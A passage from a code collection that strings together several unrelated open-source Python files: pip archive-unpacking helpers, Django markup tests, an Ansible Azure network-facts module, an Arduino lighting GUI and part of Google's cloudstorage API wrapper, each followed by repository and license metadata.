if fn.endswith('/') or fn.endswith('\\'):
# A directory
if not os.path.exists(fn):
os.makedirs(fn)
else:
fp = open(fn, 'wb')
try:
fp.write(data)
finally:
fp.close()
mode = info.external_attr >> 16
# if mode and regular file and any execute permissions for user/group/world?
if mode and stat.S_ISREG(mode) and mode & 0o111:
# make dest file have execute for user/group/world (chmod +x)
# no-op on windows per python docs
os.chmod(fn, (0o777-current_umask() | 0o111))
finally:
zipfp.close()
def untar_file(filename, location):
"""
Untar the file (with path `filename`) to the destination `location`.
All files are written based on system defaults and umask (i.e. permissions
are not preserved), except that regular file members with any execute
permissions (user, group, or world) have "chmod +x" applied after being
written. Note that for windows, any execute changes using os.chmod are
no-ops per the python docs.
"""
if not os.path.exists(location):
os.makedirs(location)
if filename.lower().endswith('.gz') or filename.lower().endswith('.tgz'):
mode = 'r:gz'
elif filename.lower().endswith('.bz2') or filename.lower().endswith('.tbz'):
mode = 'r:bz2'
elif filename.lower().endswith('.tar'):
mode = 'r'
else:
logger.warn('Cannot determine compression type for file %s' % filename)
mode = 'r:*'
tar = tarfile.open(filename, mode)
try:
# note: python<=2.5 doesn't seem to know about pax headers, filter them
leading = has_leading_dir([
member.name for member in tar.getmembers()
if member.name != 'pax_global_header'
])
for member in tar.getmembers():
fn = member.name
if fn == 'pax_global_header':
continue
if leading:
fn = split_leading_dir(fn)[1]
path = os.path.join(location, fn)
if member.isdir():
if not os.path.exists(path):
os.makedirs(path)
elif member.issym():
try:
tar._extract_member(member, path)
except:
e = sys.exc_info()[1]
# Some corrupt tar files seem to produce this
# (specifically bad symlinks)
logger.warn(
'In the tar file %s the member %s is invalid: %s'
% (filename, member.name, e))
continue
else:
try:
fp = tar.extractfile(member)
except (KeyError, AttributeError):
e = sys.exc_info()[1]
# Some corrupt tar files seem to produce this
# (specifically bad symlinks)
logger.warn(
'In the tar file %s the member %s is invalid: %s'
% (filename, member.name, e))
continue
if not os.path.exists(os.path.dirname(path)):
os.makedirs(os.path.dirname(path))
destfp = open(path, 'wb')
try:
shutil.copyfileobj(fp, destfp)
finally:
destfp.close()
fp.close()
# member have any execute permissions for user/group/world?
if member.mode & 0o111:
# make dest file have execute for user/group/world
# no-op on windows per python docs
os.chmod(path, (0o777-current_umask() | 0o111))
finally:
tar.close()
def create_download_cache_folder(folder):
logger.indent -= 2
logger.notify('Creating supposed download cache at %s' % folder)
logger.indent += 2
os.makedirs(folder)
def cache_download(target_file, temp_location, content_type):
logger.notify('Storing download in cache at %s' % display_path(target_file))
shutil.copyfile(temp_location, target_file)
fp = open(target_file+'.content-type', 'w')
fp.write(content_type)
fp.close()
def unpack_file(filename, location, content_type, link):
filename = os.path.realpath(filename)
if (content_type == 'application/zip'
or filename.endswith('.zip')
or filename.endswith('.pybundle')
or filename.endswith('.whl')
or zipfile.is_zipfile(filename)):
unzip_file(filename, location, flatten=not filename.endswith(('.pybundle', '.whl')))
elif (content_type == 'application/x-gzip'
or tarfile.is_tarfile(filename)
or splitext(filename)[1].lower() in ('.tar', '.tar.gz', '.tar.bz2', '.tgz', '.tbz')):
untar_file(filename, location)
elif (content_type and content_type.startswith('text/html')
and is_svn_page(file_contents(filename))):
# We don't really care about this
from pip.vcs.subversion import Subversion
Subversion('svn+' + link.url).unpack(location)
else:
## FIXME: handle?
## FIXME: magic signatures?
logger.fatal('Cannot unpack file %s (downloaded from %s, content-type: %s); cannot detect archive format'
% (filename, location, content_type))
raise InstallationError('Cannot determine archive format of %s' % location)
def call_subprocess(cmd, show_stdout=True,
filter_stdout=None, cwd=None,
raise_on_returncode=True,
command_level=logger.DEBUG, command_desc=None,
extra_environ=None):
if command_desc is None:
cmd_parts = []
for part in cmd:
if ' ' in part or '\n' in part or '"' in part or "'" in part:
part = '"%s"' % part.replace('"', '\\"')
cmd_parts.append(part)
command_desc = ' '.join(cmd_parts)
if show_stdout:
stdout = None
else:
stdout = subprocess.PIPE
logger.log(command_level, "Running command %s" % command_desc)
env = os.environ.copy()
if extra_environ:
env.update(extra_environ)
try:
proc = subprocess.Popen(
cmd, stderr=subprocess.STDOUT, stdin=None, stdout=stdout,
cwd=cwd, env=env)
except Exception:
e = sys.exc_info()[1]
logger.fatal(
"Error %s while executing command %s" % (e, command_desc))
raise
all_output = []
if stdout is not None:
stdout = proc.stdout
while 1:
line = console_to_str(stdout.readline())
if not line:
break
line = line.rstrip()
all_output.append(line + '\n')
if filter_stdout:
level = filter_stdout(line)
if isinstance(level, tuple):
level, line = level
logger.log(level, line)
if not logger.stdout_level_matches(level):
logger.show_progress()
else:
logger.info(line)
else:
returned_stdout, returned_stderr = proc.communicate()
all_output = [returned_stdout or '']
proc.wait()
if proc.returncode:
if raise_on_returncode:
if all_output:
logger.notify('Complete output from command %s:' % command_desc)
logger.notify('\n'.join(all_output) + '\n----------------------------------------')
raise InstallationError(
"Command %s failed with error code %s in %s"
% (command_desc, proc.returncode, cwd))
else:
logger.warn(
"Command %s had error code %s in %s"
% (command_desc, proc.returncode, cwd))
if stdout is not None:
return ''.join(all_output)
def is_prerelease(vers):
"""
Attempt to determine if this is a pre-release using PEP386/PEP426 rules.
Will return True if it is a pre-release and False if not. Versions are
assumed to be a pre-release if they cannot be parsed.
"""
normalized = version._suggest_normalized_version(vers)
if normalized is None:
# Cannot normalize, assume it is a pre-release
return True
parsed = version._normalized_key(normalized)
return any([any([y in set(["a", "b", "c", "rc", "dev"]) for y in x]) for x in parsed])
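# Hedged examples of the intended behavior (exact results depend on the
# vendored `version` module):
#   is_prerelease('1.0a1')  -> True   ('a' marks an alpha pre-release)
#   is_prerelease('1.0')    -> False
#   is_prerelease('banana') -> True   (unparseable versions are assumed pre-release)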
|
mit
|
gnuhub/intellij-community
|
python/lib/Lib/site-packages/django/contrib/markup/tests.py
|
245
|
3155
|
# Quick tests for the markup templatetags (django.contrib.markup)
import re
from django.template import Template, Context, add_to_builtins
from django.utils import unittest
from django.utils.html import escape
add_to_builtins('django.contrib.markup.templatetags.markup')
try:
import textile
except ImportError:
textile = None
try:
import markdown
except ImportError:
markdown = None
try:
import docutils
except ImportError:
docutils = None
class Templates(unittest.TestCase):
textile_content = """Paragraph 1
Paragraph 2 with "quotes" and @code@"""
markdown_content = """Paragraph 1
## An h2"""
rest_content = """Paragraph 1
Paragraph 2 with a link_
.. _link: http://www.example.com/"""
@unittest.skipUnless(textile, 'textile not installed')
def test_textile(self):
t = Template("{{ textile_content|textile }}")
rendered = t.render(Context({'textile_content':self.textile_content})).strip()
self.assertEqual(rendered.replace('\t', ''), """<p>Paragraph 1</p>
<p>Paragraph 2 with “quotes” and <code>code</code></p>""")
@unittest.skipIf(textile, 'textile is installed')
def test_no_textile(self):
t = Template("{{ textile_content|textile }}")
rendered = t.render(Context({'textile_content':self.textile_content})).strip()
self.assertEqual(rendered, escape(self.textile_content))
@unittest.skipUnless(markdown, 'markdown not installed')
def test_markdown(self):
t = Template("{{ markdown_content|markdown }}")
rendered = t.render(Context({'markdown_content':self.markdown_content})).strip()
pattern = re.compile("""<p>Paragraph 1\s*</p>\s*<h2>\s*An h2</h2>""")
self.assertTrue(pattern.match(rendered))
@unittest.skipIf(markdown, 'markdown is installed')
def test_no_markdown(self):
t = Template("{{ markdown_content|markdown }}")
rendered = t.render(Context({'markdown_content':self.markdown_content})).strip()
self.assertEqual(rendered, self.markdown_content)
@unittest.skipUnless(docutils, 'docutils not installed')
def test_docutils(self):
t = Template("{{ rest_content|restructuredtext }}")
rendered = t.render(Context({'rest_content':self.rest_content})).strip()
# Different versions of docutils return slightly different HTML
try:
# Docutils v0.4 and earlier
self.assertEqual(rendered, """<p>Paragraph 1</p>
<p>Paragraph 2 with a <a class="reference" href="http://www.example.com/">link</a></p>""")
except AssertionError, e:
# Docutils from SVN (which will become 0.5)
self.assertEqual(rendered, """<p>Paragraph 1</p>
<p>Paragraph 2 with a <a class="reference external" href="http://www.example.com/">link</a></p>""")
@unittest.skipIf(docutils, 'docutils is installed')
def test_no_docutils(self):
t = Template("{{ rest_content|restructuredtext }}")
rendered = t.render(Context({'rest_content':self.rest_content})).strip()
self.assertEqual(rendered, self.rest_content)
if __name__ == '__main__':
unittest.main()
|
apache-2.0
|
fredericlepied/ansible
|
lib/ansible/modules/cloud/azure/azure_rm_virtualnetwork_facts.py
|
8
|
5361
|
#!/usr/bin/python
#
# Copyright (c) 2016 Matt Davis, <[email protected]>
# Chris Houseknecht, <[email protected]>
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'curated'}
DOCUMENTATION = '''
---
module: azure_rm_virtualnetwork_facts
version_added: "2.1"
short_description: Get virtual network facts.
description:
- Get facts for a specific virtual network or all virtual networks within a resource group.
options:
name:
description:
- Only show results for a specific security group.
default: null
required: false
resource_group:
description:
- Limit results by resource group. Required when filtering by name.
default: null
required: false
tags:
description:
- Limit results by providing a list of tags. Format tags as 'key' or 'key:value'.
default: null
required: false
extends_documentation_fragment:
- azure
author:
- "Chris Houseknecht [email protected]"
- "Matt Davis [email protected]"
'''
EXAMPLES = '''
- name: Get facts for one virtual network
azure_rm_virtualnetwork_facts:
resource_group: Testing
name: secgroup001
- name: Get facts for all virtual networks
azure_rm_virtualnetwork_facts:
resource_group: Testing
- name: Get facts by tags
azure_rm_virtualnetwork_facts:
tags:
- testing
'''
RETURN = '''
azure_virtualnetworks:
description: List of virtual network dicts.
returned: always
type: list
example: [{
"etag": 'W/"532ba1be-ae71-40f2-9232-3b1d9cf5e37e"',
"id": "/subscriptions/XXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXX/resourceGroups/Testing/providers/Microsoft.Network/virtualNetworks/vnet2001",
"location": "eastus2",
"name": "vnet2001",
"properties": {
"addressSpace": {
"addressPrefixes": [
"10.10.0.0/16"
]
},
"provisioningState": "Succeeded",
"resourceGuid": "a7ba285f-f7e7-4e17-992a-de4d39f28612",
"subnets": []
},
"type": "Microsoft.Network/virtualNetworks"
}]
'''
try:
from msrestazure.azure_exceptions import CloudError
from azure.common import AzureMissingResourceHttpError, AzureHttpError
except:
# This is handled in azure_rm_common
pass
from ansible.module_utils.azure_rm_common import AzureRMModuleBase
AZURE_OBJECT_CLASS = 'VirtualNetwork'
class AzureRMNetworkInterfaceFacts(AzureRMModuleBase):
def __init__(self):
self.module_arg_spec = dict(
name=dict(type='str'),
resource_group=dict(type='str'),
tags=dict(type='list'),
)
self.results = dict(
changed=False,
ansible_facts=dict(azure_virtualnetworks=[])
)
self.name = None
self.resource_group = None
self.tags = None
super(AzureRMNetworkInterfaceFacts, self).__init__(self.module_arg_spec,
supports_tags=False,
facts_module=True)
def exec_module(self, **kwargs):
for key in self.module_arg_spec:
setattr(self, key, kwargs[key])
if self.name is not None:
self.results['ansible_facts']['azure_virtualnetworks'] = self.get_item()
else:
self.results['ansible_facts']['azure_virtualnetworks'] = self.list_items()
return self.results
def get_item(self):
self.log('Get properties for {0}'.format(self.name))
item = None
results = []
try:
item = self.network_client.virtual_networks.get(self.resource_group, self.name)
except CloudError:
pass
if item and self.has_tags(item.tags, self.tags):
results = [self.serialize_obj(item, AZURE_OBJECT_CLASS)]
return results
def list_resource_group(self):
self.log('List items for resource group')
try:
response = self.network_client.virtual_networks.list(self.resource_group)
except AzureHttpError as exc:
self.fail("Failed to list for resource group {0} - {1}".format(self.resource_group, str(exc)))
results = []
for item in response:
if self.has_tags(item.tags, self.tags):
results.append(self.serialize_obj(item, AZURE_OBJECT_CLASS))
return results
def list_items(self):
self.log('List all for items')
try:
response = self.network_client.virtual_networks.list_all()
except AzureHttpError as exc:
self.fail("Failed to list all items - {0}".format(str(exc)))
results = []
for item in response:
if self.has_tags(item.tags, self.tags):
results.append(self.serialize_obj(item, AZURE_OBJECT_CLASS))
return results
def main():
AzureRMNetworkInterfaceFacts()
if __name__ == '__main__':
main()
|
gpl-3.0
|
gfvandehei/roomlight-6
|
light_GUI.py
|
1
|
3827
|
import pyaudio
import numpy as np
import threading
import serial
import sys
from tkinter import *
class GUI(Frame):
def audio_thread(self):
'''
This function is in charge of collecting data from microphone
and changing it into usable data. Is meant to be ran as a thread
so it does not obstruct the GUI
'''
self.audio_exit=False
CHUNK = 2**11
RATE = 44100
p=pyaudio.PyAudio()
stream=p.open(format=pyaudio.paInt16,channels=1,rate=RATE,input=True,
frames_per_buffer=CHUNK)
while not self.audio_exit:
data = np.fromstring(stream.read(CHUNK),dtype=np.int16)
peak=np.average(np.abs(data))*2
bars="#"*int(50*peak/2**16)
henlo=int(50*peak/2**14)
henlo2=str(henlo)
try:
#print("THIS IS IT",bytes(henlo2,"utf-8"))
self.ser.write(bytes(henlo2+'\n',"utf-8"))
#print(self.ser.read())
except:
print("NUT")
stream.stop_stream()
stream.close()
p.terminate()
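# Rough numbers behind the loop above (an illustration, not original code):
# with CHUNK = 2**11 samples at RATE = 44100 Hz each read covers ~46 ms of
# audio, and henlo = int(50*peak/2**14) maps the averaged 16-bit amplitude
# onto a small integer that the Arduino sketch is assumed to interpret as a
# brightness/level value.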
def audio_command(self):
'''
this function is in charge of controlling the audio visualizer thread
should be called by clicking the audio visualizer button
'''
self.visualthread=threading.Thread(target=self.audio_thread)
self.visualthread.start()
def reset_command(self):
'''
This is the function for the reset button; it toggles the flag that
tells the audio visualizer thread to exit.
'''
self.audio_exit=not self.audio_exit
print(self.audio_exit)
def createWidgets(self):
self.reset_button=Button(text="reset", command=self.reset_command)
self.lightdisplay=Message(width=300,text="-"*72)
self.redval=Spinbox(from_=0,to=255)#begin row 1
self.greenval=Spinbox(from_=0,to=255)
self.blueval=Spinbox(from_=0,to=255)
self.LEDSelector=Spinbox(from_=0,to=self.LEDNUM)
self.colorEnter=Button(text="Display")#end row 1
self.TimerIn=Entry()#begin row 2
self.TimerCheck=Button(text="Start")#row 3
self.AudioVisualizer=Button(text="Audio Visualizer",command=self.audio_command)#row 4
self.weather=Button(text="Weather")
self.screen=Button(text="Audio Visualizer")
self.TBD1=Button(text="Audio Visualizer")
self.TBD2=Button(text="Audio Visualizer")
#pack row 1
self.lightdisplay.grid(row=0)
self.reset_button.grid(row=1, column=3)
self.redval.grid(row=2,column=0)
self.greenval.grid(row=3, column=0)
self.blueval.grid(row=4,column=0)
self.colorEnter.grid(row=5,column=0)
self.TimerIn.grid(row=2,column=1)
self.TimerCheck.grid(row=2,column=2)
self.AudioVisualizer.grid(row=2,column=3)
self.weather.grid(row=3,column=3)
self.screen.grid(row=4,column=3)
self.TBD1.grid(row=5,column=3)
self.TBD2.grid(row=6,column=3)
#end pack
def __init__(self, master=None):
self.audio_exit=False
Frame.__init__(self, master)
self.LEDNUM=0
if(sys.platform=="linux"):
try:
self.ser=serial.Serial("/dev/tty.usbserial",9600)
except:
print("could not connect (linux)")
else:
try:
self.ser=serial.Serial("COM5",9600)
except:
print("could not connect (Windows)")
self.createWidgets()
if __name__=="__main__":
root=Tk()
try:
ser=serial.Serial("COM5",9600)
except:
print("could not find arduino on COM5, check connection")
mainWindow=GUI(master=root)
mainWindow.mainloop()
|
mit
|
kubernetes/test-infra
|
gubernator/third_party/cloudstorage/storage_api.py
|
75
|
28161
|
# Copyright 2012 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
"""Python wrappers for the Google Storage RESTful API."""
__all__ = ['ReadBuffer',
'StreamingBuffer',
]
import collections
import os
import urlparse
from . import api_utils
from . import common
from . import errors
from . import rest_api
try:
from google.appengine.api import urlfetch
from google.appengine.ext import ndb
except ImportError:
from google.appengine.api import urlfetch
from google.appengine.ext import ndb
def _get_storage_api(retry_params, account_id=None):
"""Returns storage_api instance for API methods.
Args:
retry_params: An instance of api_utils.RetryParams. If none,
thread's default will be used.
account_id: Internal-use only.
Returns:
A storage_api instance to handle urlfetch work to GCS.
On dev appserver, this instance by default will talk to a local stub
unless common.ACCESS_TOKEN is set. That token will be used to talk
to the real GCS.
"""
api = _StorageApi(_StorageApi.full_control_scope,
service_account_id=account_id,
retry_params=retry_params)
if common.local_run() and not common.get_access_token():
api.api_url = common.local_api_url()
if common.get_access_token():
api.token = common.get_access_token()
return api
class _StorageApi(rest_api._RestApi):
"""A simple wrapper for the Google Storage RESTful API.
WARNING: Do NOT directly use this api. It's an implementation detail
and is subject to change at any release.
All async methods have similar args and returns.
Args:
path: The path to the Google Storage object or bucket, e.g.
'/mybucket/myfile' or '/mybucket'.
**kwd: Options for urlfetch. e.g.
headers={'content-type': 'text/plain'}, payload='blah'.
Returns:
A ndb Future. When fulfilled, future.get_result() should return
a tuple of (status, headers, content) that represents a HTTP response
of Google Cloud Storage XML API.
"""
api_url = 'https://storage.googleapis.com'
read_only_scope = 'https://www.googleapis.com/auth/devstorage.read_only'
read_write_scope = 'https://www.googleapis.com/auth/devstorage.read_write'
full_control_scope = 'https://www.googleapis.com/auth/devstorage.full_control'
def __getstate__(self):
"""Store state as part of serialization/pickling.
Returns:
A tuple (of dictionaries) with the state of this object
"""
return (super(_StorageApi, self).__getstate__(), {'api_url': self.api_url})
def __setstate__(self, state):
"""Restore state as part of deserialization/unpickling.
Args:
state: the tuple from a __getstate__ call
"""
superstate, localstate = state
super(_StorageApi, self).__setstate__(superstate)
self.api_url = localstate['api_url']
@api_utils._eager_tasklet
@ndb.tasklet
def do_request_async(self, url, method='GET', headers=None, payload=None,
deadline=None, callback=None):
"""Inherit docs.
This method translates urlfetch exceptions to more service specific ones.
"""
if headers is None:
headers = {}
if 'x-goog-api-version' not in headers:
headers['x-goog-api-version'] = '2'
headers['accept-encoding'] = 'gzip, *'
try:
resp_tuple = yield super(_StorageApi, self).do_request_async(
url, method=method, headers=headers, payload=payload,
deadline=deadline, callback=callback)
except urlfetch.DownloadError, e:
raise errors.TimeoutError(
'Request to Google Cloud Storage timed out.', e)
raise ndb.Return(resp_tuple)
def post_object_async(self, path, **kwds):
"""POST to an object."""
return self.do_request_async(self.api_url + path, 'POST', **kwds)
def put_object_async(self, path, **kwds):
"""PUT an object."""
return self.do_request_async(self.api_url + path, 'PUT', **kwds)
def get_object_async(self, path, **kwds):
"""GET an object.
Note: No payload argument is supported.
"""
return self.do_request_async(self.api_url + path, 'GET', **kwds)
def delete_object_async(self, path, **kwds):
"""DELETE an object.
Note: No payload argument is supported.
"""
return self.do_request_async(self.api_url + path, 'DELETE', **kwds)
def head_object_async(self, path, **kwds):
"""HEAD an object.
Depending on request headers, HEAD returns various object properties,
e.g. Content-Length, Last-Modified, and ETag.
Note: No payload argument is supported.
"""
return self.do_request_async(self.api_url + path, 'HEAD', **kwds)
def get_bucket_async(self, path, **kwds):
"""GET a bucket."""
return self.do_request_async(self.api_url + path, 'GET', **kwds)
def compose_object(self, file_list, destination_file, content_type):
"""COMPOSE multiple objects together.
Using the given list of files, calls the put object with the compose flag.
This call merges all the files into the destination file.
Args:
file_list: list of dicts with the file name.
destination_file: Path to the destination file.
content_type: Content type for the destination file.
"""
xml_setting_list = ['<ComposeRequest>']
for meta_data in file_list:
xml_setting_list.append('<Component>')
for key, val in meta_data.iteritems():
xml_setting_list.append('<%s>%s</%s>' % (key, val, key))
xml_setting_list.append('</Component>')
xml_setting_list.append('</ComposeRequest>')
xml = ''.join(xml_setting_list)
if content_type is not None:
headers = {'Content-Type': content_type}
else:
headers = None
status, resp_headers, content = self.put_object(
api_utils._quote_filename(destination_file) + '?compose',
payload=xml,
headers=headers)
errors.check_status(status, [200], destination_file, resp_headers,
body=content)
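# Illustrative payload produced above for a two-part compose (dict keys
# assumed to be 'Name'; adjust to whatever metadata the caller supplies):
#   <ComposeRequest><Component><Name>part-1</Name></Component>
#   <Component><Name>part-2</Name></Component></ComposeRequest>
# sent via PUT to '<destination>?compose'.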
_StorageApi = rest_api.add_sync_methods(_StorageApi)
class ReadBuffer(object):
"""A class for reading Google storage files."""
DEFAULT_BUFFER_SIZE = 1024 * 1024
MAX_REQUEST_SIZE = 30 * DEFAULT_BUFFER_SIZE
def __init__(self,
api,
path,
buffer_size=DEFAULT_BUFFER_SIZE,
max_request_size=MAX_REQUEST_SIZE,
offset=0):
"""Constructor.
Args:
api: A StorageApi instance.
path: Quoted/escaped path to the object, e.g. /mybucket/myfile
buffer_size: buffer size. The ReadBuffer keeps
one buffer. But there may be a pending future that contains
a second buffer. This size must be less than max_request_size.
max_request_size: Max bytes to request in one urlfetch.
offset: Number of bytes to skip at the start of the file. If None, 0 is
used.
"""
self._api = api
self._path = path
self.name = api_utils._unquote_filename(path)
self.closed = False
assert buffer_size <= max_request_size
self._buffer_size = buffer_size
self._max_request_size = max_request_size
self._offset = offset
self._buffer = _Buffer()
self._etag = None
get_future = self._get_segment(offset, self._buffer_size, check_response=False)
status, headers, content = self._api.head_object(path)
errors.check_status(status, [200], path, resp_headers=headers, body=content)
self._file_size = long(common.get_stored_content_length(headers))
self._check_etag(headers.get('etag'))
self._buffer_future = None
if self._file_size != 0:
content, check_response_closure = get_future.get_result()
check_response_closure()
self._buffer.reset(content)
self._request_next_buffer()
def __getstate__(self):
"""Store state as part of serialization/pickling.
The contents of the read buffer are not stored, only the current offset for
data read by the client. A new read buffer is established at unpickling.
The head information for the object (file size and etag) are stored to
reduce startup and ensure the file has not changed.
Returns:
A dictionary with the state of this object
"""
return {'api': self._api,
'path': self._path,
'buffer_size': self._buffer_size,
'request_size': self._max_request_size,
'etag': self._etag,
'size': self._file_size,
'offset': self._offset,
'closed': self.closed}
def __setstate__(self, state):
"""Restore state as part of deserialization/unpickling.
Args:
state: the dictionary from a __getstate__ call
Along with restoring the state, pre-fetch the next read buffer.
"""
self._api = state['api']
self._path = state['path']
self.name = api_utils._unquote_filename(self._path)
self._buffer_size = state['buffer_size']
self._max_request_size = state['request_size']
self._etag = state['etag']
self._file_size = state['size']
self._offset = state['offset']
self._buffer = _Buffer()
self.closed = state['closed']
self._buffer_future = None
if self._remaining() and not self.closed:
self._request_next_buffer()
def __iter__(self):
"""Iterator interface.
Note the ReadBuffer container itself is the iterator. It's
(quote PEP0234)
'destructive: they consumes all the values and a second iterator
cannot easily be created that iterates independently over the same values.
You could open the file for the second time, or seek() to the beginning.'
Returns:
Self.
"""
return self
def next(self):
line = self.readline()
if not line:
raise StopIteration()
return line
def readline(self, size=-1):
"""Read one line delimited by '\n' from the file.
A trailing newline character is kept in the string. It may be absent when a
file ends with an incomplete line. If the size argument is non-negative,
it specifies the maximum string size (counting the newline) to return.
A negative size is the same as unspecified. Empty string is returned
only when EOF is encountered immediately.
Args:
size: Maximum number of bytes to read. If not specified, readline stops
only on '\n' or EOF.
Returns:
The data read as a string.
Raises:
IOError: When this buffer is closed.
"""
self._check_open()
if size == 0 or not self._remaining():
return ''
data_list = []
newline_offset = self._buffer.find_newline(size)
while newline_offset < 0:
data = self._buffer.read(size)
size -= len(data)
self._offset += len(data)
data_list.append(data)
if size == 0 or not self._remaining():
return ''.join(data_list)
self._buffer.reset(self._buffer_future.get_result())
self._request_next_buffer()
newline_offset = self._buffer.find_newline(size)
data = self._buffer.read_to_offset(newline_offset + 1)
self._offset += len(data)
data_list.append(data)
return ''.join(data_list)
def read(self, size=-1):
"""Read data from RAW file.
Args:
size: Number of bytes to read as integer. Actual number of bytes
read is always equal to size unless EOF is reached. If size is
negative or unspecified, read the entire file.
Returns:
data read as str.
Raises:
IOError: When this buffer is closed.
"""
self._check_open()
if not self._remaining():
return ''
data_list = []
while True:
remaining = self._buffer.remaining()
if size >= 0 and size < remaining:
data_list.append(self._buffer.read(size))
self._offset += size
break
else:
size -= remaining
self._offset += remaining
data_list.append(self._buffer.read())
if self._buffer_future is None:
if size < 0 or size >= self._remaining():
needs = self._remaining()
else:
needs = size
data_list.extend(self._get_segments(self._offset, needs))
self._offset += needs
break
if self._buffer_future:
self._buffer.reset(self._buffer_future.get_result())
self._buffer_future = None
if self._buffer_future is None:
self._request_next_buffer()
return ''.join(data_list)
def _remaining(self):
return self._file_size - self._offset
def _request_next_buffer(self):
"""Request next buffer.
Requires self._offset and self._buffer are in consistent state.
"""
self._buffer_future = None
next_offset = self._offset + self._buffer.remaining()
if next_offset != self._file_size:
self._buffer_future = self._get_segment(next_offset,
self._buffer_size)
def _get_segments(self, start, request_size):
"""Get segments of the file from Google Storage as a list.
A large request is broken into segments to avoid hitting urlfetch
response size limit. Each segment is returned from a separate urlfetch.
Args:
start: start offset to request. Inclusive. Have to be within the
range of the file.
request_size: number of bytes to request.
Returns:
A list of file segments in order
"""
if not request_size:
return []
end = start + request_size
futures = []
while request_size > self._max_request_size:
futures.append(self._get_segment(start, self._max_request_size))
request_size -= self._max_request_size
start += self._max_request_size
if start < end:
futures.append(self._get_segment(start, end - start))
return [fut.get_result() for fut in futures]
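# Worked example of the segmentation above (illustrative only): with
# _max_request_size = 30MB, a request for bytes [0, 70MB) is issued as three
# separate fetches covering 30MB, 30MB and the remaining 10MB, and the
# results are returned in order.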
@ndb.tasklet
def _get_segment(self, start, request_size, check_response=True):
"""Get a segment of the file from Google Storage.
Args:
start: start offset of the segment. Inclusive. Have to be within the
range of the file.
request_size: number of bytes to request. Have to be small enough
for a single urlfetch request. May go over the logical range of the
file.
check_response: True to check the validity of GCS response automatically
before the future returns. False otherwise. See Yields section.
Yields:
If check_response is True, the segment [start, start + request_size)
of the file.
Otherwise, a tuple. The first element is the unverified file segment.
The second element is a closure that checks response. Caller should
first invoke the closure before consuming the file segment.
Raises:
ValueError: if the file has changed while reading.
"""
end = start + request_size - 1
content_range = '%d-%d' % (start, end)
headers = {'Range': 'bytes=' + content_range}
status, resp_headers, content = yield self._api.get_object_async(
self._path, headers=headers)
def _checker():
errors.check_status(status, [200, 206], self._path, headers,
resp_headers, body=content)
self._check_etag(resp_headers.get('etag'))
if check_response:
_checker()
raise ndb.Return(content)
raise ndb.Return(content, _checker)
def _check_etag(self, etag):
"""Check if etag is the same across requests to GCS.
If self._etag is None, set it. If etag is set, check that the new
etag equals the old one.
In the __init__ method, we fire one HEAD and one GET request using
ndb tasklet. One of them would return first and set the first value.
Args:
etag: etag from a GCS HTTP response. None if etag is not part of the
response header. It could be None for example in the case of GCS
composite file.
Raises:
ValueError: if two etags are not equal.
"""
if etag is None:
return
elif self._etag is None:
self._etag = etag
elif self._etag != etag:
raise ValueError('File on GCS has changed while reading.')
def close(self):
self.closed = True
self._buffer = None
self._buffer_future = None
def __enter__(self):
return self
def __exit__(self, atype, value, traceback):
self.close()
return False
def seek(self, offset, whence=os.SEEK_SET):
"""Set the file's current offset.
Note if the new offset is out of bound, it is adjusted to either 0 or EOF.
Args:
offset: seek offset as number.
whence: seek mode. Supported modes are os.SEEK_SET (absolute seek),
os.SEEK_CUR (seek relative to the current position), and os.SEEK_END
(seek relative to the end, offset should be negative).
Raises:
IOError: When this buffer is closed.
ValueError: When whence is invalid.
"""
self._check_open()
self._buffer.reset()
self._buffer_future = None
if whence == os.SEEK_SET:
self._offset = offset
elif whence == os.SEEK_CUR:
self._offset += offset
elif whence == os.SEEK_END:
self._offset = self._file_size + offset
else:
raise ValueError('Whence mode %s is invalid.' % str(whence))
self._offset = min(self._offset, self._file_size)
self._offset = max(self._offset, 0)
if self._remaining():
self._request_next_buffer()
def tell(self):
"""Tell the file's current offset.
Returns:
current offset in reading this file.
Raises:
IOError: When this buffer is closed.
"""
self._check_open()
return self._offset
def _check_open(self):
if self.closed:
raise IOError('Buffer is closed.')
def seekable(self):
return True
def readable(self):
return True
def writable(self):
return False
class _Buffer(object):
"""In memory buffer."""
def __init__(self):
self.reset()
def reset(self, content='', offset=0):
self._buffer = content
self._offset = offset
def read(self, size=-1):
"""Returns bytes from self._buffer and update related offsets.
Args:
size: number of bytes to read starting from current offset.
Read the entire buffer if negative.
Returns:
Requested bytes from buffer.
"""
if size < 0:
offset = len(self._buffer)
else:
offset = self._offset + size
return self.read_to_offset(offset)
def read_to_offset(self, offset):
"""Returns bytes from self._buffer and update related offsets.
Args:
offset: read from current offset to this offset, exclusive.
Returns:
Requested bytes from buffer.
"""
assert offset >= self._offset
result = self._buffer[self._offset: offset]
self._offset += len(result)
return result
def remaining(self):
return len(self._buffer) - self._offset
def find_newline(self, size=-1):
"""Search for newline char in buffer starting from current offset.
Args:
size: number of bytes to search. -1 means all.
Returns:
offset of newline char in buffer. -1 if doesn't exist.
"""
if size < 0:
return self._buffer.find('\n', self._offset)
return self._buffer.find('\n', self._offset, self._offset + size)
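# Minimal sketch of how _Buffer behaves (illustrative, not part of the API):
#   buf = _Buffer()
#   buf.reset('hello\nworld')
#   buf.find_newline()      # -> 5
#   buf.read_to_offset(6)   # -> 'hello\n', advancing the internal offset
#   buf.remaining()         # -> 5 ('world' is left)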
class StreamingBuffer(object):
"""A class for creating large objects using the 'resumable' API.
The API is a subset of the Python writable stream API sufficient to
support writing zip files using the zipfile module.
The exact sequence of calls and use of headers is documented at
https://developers.google.com/storage/docs/developer-guide#unknownresumables
"""
_blocksize = 256 * 1024
_flushsize = 8 * _blocksize
_maxrequestsize = 9 * 4 * _blocksize
def __init__(self,
api,
path,
content_type=None,
gcs_headers=None):
"""Constructor.
Args:
api: A StorageApi instance.
path: Quoted/escaped path to the object, e.g. /mybucket/myfile
content_type: Optional content-type; Default value is
delegate to Google Cloud Storage.
gcs_headers: additional gs headers as a str->str dict, e.g
{'x-goog-acl': 'private', 'x-goog-meta-foo': 'foo'}.
